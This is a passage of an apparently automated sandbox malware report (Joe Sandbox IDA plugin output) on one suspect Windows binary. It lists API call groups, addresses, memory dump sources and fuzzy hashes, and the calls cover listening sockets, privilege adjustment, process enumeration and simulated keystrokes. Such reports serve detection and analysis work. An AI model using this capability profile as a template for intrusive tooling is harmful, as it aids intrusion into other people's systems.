                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548CB7
                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00548CD3
                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00548CE2
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00548CFC
                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00548D10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                  • String ID:
                                                                                  • API String ID: 1279440585-0
                                                                                  • Opcode ID: aed5f6c5fd7d70a87709980dd6b33fa0788351de6b89006b1ee4673ef312a51d
                                                                                  • Instruction ID: caaeb10d7a2bb38f715853a447d7bec1df5c429b38fb93e9100e4b03fc3d3ffd
                                                                                  • Opcode Fuzzy Hash: aed5f6c5fd7d70a87709980dd6b33fa0788351de6b89006b1ee4673ef312a51d
                                                                                  • Instruction Fuzzy Hash: AF21E4316002019FCB14EF28DC89B7EBBB9FF48318F104159F916AB2D1CB30AD469B61
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00536554
                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00536564
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00536583
                                                                                  • __wsplitpath.LIBCMT ref: 005365A7
                                                                                  • _wcscat.LIBCMT ref: 005365BA
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 005365F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                  • String ID:
                                                                                  • API String ID: 1605983538-0
                                                                                  • Opcode ID: c957cd1cf53803ba8da620f8a3862b75b8dcbeaca775f534a72eb6180d4fcd25
                                                                                  • Instruction ID: 239484f4877fb9679905373caa02bfc215d1fdc272d2aa8571f3d43af9d08ed4
                                                                                  • Opcode Fuzzy Hash: c957cd1cf53803ba8da620f8a3862b75b8dcbeaca775f534a72eb6180d4fcd25
                                                                                  • Instruction Fuzzy Hash: 76215371900219EBDB20ABA4DC89BDDBBBCBB58300F9044B9E505E7141DB759FC5DB60
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 005313DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: ($,2Z$<2Z$|
                                                                                  • API String ID: 1659193697-1582873280
                                                                                  • Opcode ID: 219f9c5c61162028490e0e82b8dad9ec8b1aef0cf0c958e04d62f03d99a6201d
                                                                                  • Instruction ID: 83e3aa0a1691d50f39872b54eb2aebd13fc4bbcca0a4057ab97273868e0cc121
                                                                                  • Opcode Fuzzy Hash: 219f9c5c61162028490e0e82b8dad9ec8b1aef0cf0c958e04d62f03d99a6201d
                                                                                  • Instruction Fuzzy Hash: 90320575A00A059FCB28CF69D490A6ABBF0FF48310F15C56EE59ADB3A1E770E941CB44
                                                                                  APIs
                                                                                    • Part of subcall function 0054A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00549296
                                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 005492B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4170576061-0
                                                                                  • Opcode ID: f1de47a0ea1bc918f9910c10a03a77f81c868bc322efccbd86c2f48945e4401f
                                                                                  • Instruction ID: aba52d59149d015b3c1e3fb4ade35c1ac26682276f4b7c918753607a38a35396
                                                                                  • Opcode Fuzzy Hash: f1de47a0ea1bc918f9910c10a03a77f81c868bc322efccbd86c2f48945e4401f
                                                                                  • Instruction Fuzzy Hash: AC41C170600205AFDB14AF28C84AE7E7BEDFF84728F04454DF956AB2C2CB749D019B95
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053EB8A
                                                                                  • _wcscmp.LIBCMT ref: 0053EBBA
                                                                                  • _wcscmp.LIBCMT ref: 0053EBCF
                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0053EBE0
                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0053EC0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 2387731787-0
                                                                                  • Opcode ID: 13c40414da1cc9b71838895f41e5a8fd3d1fcf5dfe4e0c1f238c1f9034d286a1
                                                                                  • Instruction ID: 6c3aa6c59827860f91bffdabbaae22d1d86698c1d3f2040098060d14bf3656ba
                                                                                  • Opcode Fuzzy Hash: 13c40414da1cc9b71838895f41e5a8fd3d1fcf5dfe4e0c1f238c1f9034d286a1
                                                                                  • Instruction Fuzzy Hash: BC41DD356042029FDB18DF28C495E9ABBE4FF89324F10455DE95A8B3E1DB31AD84CF91
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                  • String ID:
                                                                                  • API String ID: 292994002-0
                                                                                  • Opcode ID: 5ed26a6e036d14e463c5701669879fd75e7a62d614124f30b78ade5bab51bd74
                                                                                  • Instruction ID: 38a3f8f333432cfa3399218b46c7e68ee08fb1ba754e3acaf18d20fbff513127
                                                                                  • Opcode Fuzzy Hash: 5ed26a6e036d14e463c5701669879fd75e7a62d614124f30b78ade5bab51bd74
                                                                                  • Instruction Fuzzy Hash: 89119031700A156BE7211F26DC58A7E7FA9FF94762F04042AFC49E7281CF70994ADBA4
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0050E014,771B0AE0,0050DEF1,0058DC38,?,?), ref: 0050E02C
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0050E03E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                  • API String ID: 2574300362-192647395
                                                                                  • Opcode ID: 633d96295013978f89ae025b9bbd59f4fc5c1f45870db7be2627cfa8658df29f
                                                                                  • Instruction ID: 42f3b8708f2136c3ec47093227be51b7bd695ea20b0a8a59ff2dd76b41fe6a1d
                                                                                  • Opcode Fuzzy Hash: 633d96295013978f89ae025b9bbd59f4fc5c1f45870db7be2627cfa8658df29f
                                                                                  • Instruction Fuzzy Hash: 77D05EB04007129FC7214B64E80E62A7AF8BF11310F28481AA88692190D7B4C8C4DA60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                  • String ID: @$ [$ [$ [
                                                                                  • API String ID: 3728558374-3600346879
                                                                                  • Opcode ID: 37d0486d8157fcfc7e320d56f3289c4e3b9dcd379b554970f817399a34b53ec2
                                                                                  • Instruction ID: bd81d79a756e2a6630cf8090fda39b95b71f3792692a59e3dcb74029c116d6a4
                                                                                  • Opcode Fuzzy Hash: 37d0486d8157fcfc7e320d56f3289c4e3b9dcd379b554970f817399a34b53ec2
                                                                                  • Instruction Fuzzy Hash: 9572CE74E0420A9FCF10EF94C495ABEBFB9FF88304F14845AE915AB291D734AE45CB91
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0050B22F
                                                                                    • Part of subcall function 0050B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0050B5A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Proc$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2749884682-0
                                                                                  • Opcode ID: 4178e53f0fcd8bf1c401124a329c38ca4f3563c0cca9f7627f52457a65699a56
                                                                                  • Instruction ID: 9b5f4fb772767be31f81aae77301b99a61d6d655ce913d481cf814fbbd629f80
                                                                                  • Opcode Fuzzy Hash: 4178e53f0fcd8bf1c401124a329c38ca4f3563c0cca9f7627f52457a65699a56
                                                                                  • Instruction Fuzzy Hash: CFA14578115107BAFA386F295CDEEBF2E6CFB92741B500A1AF802D71D1DB14AC01E272
                                                                                  APIs
                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,005443BF,00000000), ref: 00544FA6
                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00544FD2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                  • String ID:
                                                                                  • API String ID: 599397726-0
                                                                                  • Opcode ID: b3aa2b5f9d6b1e2def2f1b3568ce20c841603c10da0d4f618c9a76cbd641f0ac
                                                                                  • Instruction ID: 9dc3ef5b53336b6729b0f878c39feddeac61fe7ad1329322fd4de212e774e0d5
                                                                                  • Opcode Fuzzy Hash: b3aa2b5f9d6b1e2def2f1b3568ce20c841603c10da0d4f618c9a76cbd641f0ac
                                                                                  • Instruction Fuzzy Hash: 3E41E975544609BFEB20DE84DC89FFF7BBCFB8071CF10402AF60566181EA719E459A60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: \QZ
                                                                                  • API String ID: 4104443479-3002718777
                                                                                  • Opcode ID: 306a571eff5f6ad43e246cc8b45a437dfcdb3adb4ead19d54014a2d4e285a388
                                                                                  • Instruction ID: e06d6701b2a09fed4e89b285de2740b13ff70bc4396aaf1e454e850436a2a8ff
                                                                                  • Opcode Fuzzy Hash: 306a571eff5f6ad43e246cc8b45a437dfcdb3adb4ead19d54014a2d4e285a388
                                                                                  • Instruction Fuzzy Hash: 48A25D70D04219CFDB24CF58C8806ADBBB1FF48314F2581AAD959AB391D7389E82DF55
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0053E20D
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0053E267
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0053E2B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1682464887-0
                                                                                  • Opcode ID: 0d9d190be9c1feccb7da15813a898d434a9230d27d0202c9d481a49495ed2661
                                                                                  • Instruction ID: 61cde40799cb87f5c49b5924dfcc42aab645691dd52b5dc45c04753ac710a200
                                                                                  • Opcode Fuzzy Hash: 0d9d190be9c1feccb7da15813a898d434a9230d27d0202c9d481a49495ed2661
                                                                                  • Instruction Fuzzy Hash: EF216035A00118EFCB00DFA5D885EAEBBF8FF98314F0484A9E905A7251DB319955DB50
                                                                                  APIs
                                                                                    • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
                                                                                    • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0052B180
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0052B1AD
                                                                                  • GetLastError.KERNEL32 ref: 0052B1BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 1922334811-0
                                                                                  • Opcode ID: 81d34a47c2c895918fad2d0e5da57514d3fd456cfb2352485f79a74554d52f59
                                                                                  • Instruction ID: 1c4afffcec430dafd7f49b9318418404ea74ce4b25d13ac04a2bca1bbc62815e
                                                                                  • Opcode Fuzzy Hash: 81d34a47c2c895918fad2d0e5da57514d3fd456cfb2352485f79a74554d52f59
                                                                                  • Instruction Fuzzy Hash: 4C119DB1400205AFE7289F54EC89D2ABBB8FF45710B20852EE45A97280EB70FC41CB60
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00536623
                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00536664
                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0053666F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 33631002-0
                                                                                  • Opcode ID: b6eacc50cd37d94480aeda086c734a80dd30af944beee603171a766ef0c44f13
                                                                                  • Instruction ID: 91d69057d2601b7ba039a62c36bbc11697403fd6a0cdb4989aca7de454c798d3
                                                                                  • Opcode Fuzzy Hash: b6eacc50cd37d94480aeda086c734a80dd30af944beee603171a766ef0c44f13
                                                                                  • Instruction Fuzzy Hash: 0D115E71E01228BFDB108FA4EC45BAEBBBCEB45B50F108156F904E6290D3B05A059BA1
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00537223
                                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0053723A
                                                                                  • FreeSid.ADVAPI32(?), ref: 0053724A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                  • String ID:
                                                                                  • API String ID: 3429775523-0
                                                                                  • Opcode ID: 438cc67b8c3296c14fef0fa031aa6a36b516d4939c2ab3cea0525271db06c72c
                                                                                  • Instruction ID: 85d5d3df692c7ecca48bff893c657207855317dc03e83fa2bc1f8aac0c9954e2
                                                                                  • Opcode Fuzzy Hash: 438cc67b8c3296c14fef0fa031aa6a36b516d4939c2ab3cea0525271db06c72c
                                                                                  • Instruction Fuzzy Hash: 46F01275904209FFDF04DFE5DD89EEEBBB9FF08201F105469A506E2191E37156449B10
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0053F599
                                                                                  • FindClose.KERNEL32(00000000), ref: 0053F5C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: b3064c4ca21fc7b7c99cebc25859a74ec45ac7a9b9af8b95be754e80a4350355
                                                                                  • Instruction ID: 16b022768ec9032efa39d11f7650363e986a9e294239d56ed1dbc4bc57e95574
                                                                                  • Opcode Fuzzy Hash: b3064c4ca21fc7b7c99cebc25859a74ec45ac7a9b9af8b95be754e80a4350355
                                                                                  • Instruction Fuzzy Hash: 3411C4716002019FD710EF28D849A2EF7E8FF94324F00891EF8A9D7291CB30AD04CB91
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0054BE6A,?,?,00000000,?), ref: 0053CEA7
                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0054BE6A,?,?,00000000,?), ref: 0053CEB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: f8d11e259c8be434c0af640bf073c4061d6c57cc2e40b19f075bb2e97cfb8296
                                                                                  • Instruction ID: 52457fb8e17f31922763860e6c89089c8b4b0bf7e8f8c38e8fe77ece33966899
                                                                                  • Opcode Fuzzy Hash: f8d11e259c8be434c0af640bf073c4061d6c57cc2e40b19f075bb2e97cfb8296
                                                                                  • Instruction Fuzzy Hash: 31F0823510422DBBDB109BA4DC49FEA7B7DBF08365F004565F919E6181D6709A44DBB0
                                                                                  APIs
                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00534153
                                                                                  • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00534166
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: InputSendkeybd_event
                                                                                  • String ID:
                                                                                  • API String ID: 3536248340-0
                                                                                  • Opcode ID: 3adb1c10a92da85b4d263ff617c84b5bbefcaa0e7da32c2f59945ed8f0586c6f
                                                                                  • Instruction ID: 32fb3506ed5492228e43b87fa11d42d9bae41ae5e02af2642172d0399e8e72ab
                                                                                  • Opcode Fuzzy Hash: 3adb1c10a92da85b4d263ff617c84b5bbefcaa0e7da32c2f59945ed8f0586c6f
                                                                                  • Instruction Fuzzy Hash: 27F0677080028DAFDB058FA0C805BBE7FB0FF10305F00844AF966A6192D7799656EFA0
                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0052ACC0), ref: 0052AB99
                                                                                  • CloseHandle.KERNEL32(?,?,0052ACC0), ref: 0052ABAB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 81990902-0
                                                                                  • Opcode ID: f3341004b1303cce99a0f151a3bd5c44c9c4f7be8a5b19e0f6efc03583a73e47
                                                                                  • Instruction ID: c42e839ca30d8776e5b41db85a60b163b94203b4526de6da80cdd5a80223fdc1
                                                                                  • Opcode Fuzzy Hash: f3341004b1303cce99a0f151a3bd5c44c9c4f7be8a5b19e0f6efc03583a73e47
                                                                                  • Instruction Fuzzy Hash: E9E0BF71000511AFEB252F54FC09D767BB9EF443207108829B85981871D7625D94EB50
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00516DB3,-0000031A,?,?,00000001), ref: 005181B1
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005181BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: f56bc16f8ecb019f855fabcbe9535951e235c622f612ec4787544ec30fd78469
                                                                                  • Instruction ID: 193ddb1aafe70942847cabf4c2ff0be935a913274b7084321c9d0c362c1dc40c
                                                                                  • Opcode Fuzzy Hash: f56bc16f8ecb019f855fabcbe9535951e235c622f612ec4787544ec30fd78469
                                                                                  • Instruction Fuzzy Hash: E5B09231044608ABDB402BA1FC09B587FB8EF18662F004410F60D480618B725494BAB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e4295e6514c466c2f5880cc8a298790ec9c09ef9d18f3374b705c6173d79b7b0
                                                                                  • Instruction ID: 47b372476e83783ec5904ac39f56f99ca70900d0708a841a392aaa879f8fd7b1
                                                                                  • Opcode Fuzzy Hash: e4295e6514c466c2f5880cc8a298790ec9c09ef9d18f3374b705c6173d79b7b0
                                                                                  • Instruction Fuzzy Hash: C0321631D29F014DEB239635D822335AA98FFB73D4F15D727E819B59A6EB28C4C35210
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
